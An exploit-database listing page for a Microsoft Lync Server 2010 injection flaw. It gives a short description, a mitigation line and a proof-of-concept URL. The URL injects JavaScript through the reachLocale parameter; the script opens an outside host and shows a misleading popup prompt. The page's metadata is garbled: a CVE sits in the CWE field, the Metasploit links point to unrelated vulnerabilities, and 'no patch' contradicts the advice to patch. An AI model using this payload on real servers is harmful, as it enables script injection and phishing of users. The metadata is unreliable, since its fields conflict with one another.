header-logo
Suggest Exploit
vendor:
Microsoft Lync Server 2010
by:
Unknown
7.5
CVSS
HIGH
Remote Command-Injection
78
CWE
Product Name: Microsoft Lync Server 2010
Affected Version From: 4.0.7577.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2011-2010
CPE: a:microsoft:lync_server:2010
Metasploit: https://www.rapid7.com/db/vulnerabilities/jboss_enterprise_application_platform-cve-2011-4085/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-5244/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-0433/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-0433/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-0433/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-4819/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-4818/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-1479/https://www.rapid7.com/db/vulnerabilities/apple-osx-timemachine-cve-2011-3462/https://www.rapid7.com/db/vulnerabilities/apple-osx-addressbook-cve-2011-3462/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1845/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1797/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0880/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0168/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0439/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1258/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1360/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1359/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-2999/https://www.rapid7.com/db/vulnerabilities/mfsa2011-38-cve-2011-2999/https://www.rapid7.com/db/?q=CVE-2011-2010&type=&page=2https://www.rapid7.com/db/?q=CVE-2011-2010&type=&page=3https://www.rapid7.com/db/?q=CVE-2011-2010&type=&page=4https://www.rapid7.com/db/?q=CVE-2011-2010&type=&page=2
Other Scripts:
Platforms Tested: Windows
Unknown

Microsoft Lync Server 2010 Remote Command-Injection Vulnerability

Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary commands in the context of the application.

Mitigation:

Apply the necessary patches provided by Microsoft to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48235/info

Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected. 

https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//

Navigation

Suggest Exploit

Services By CQR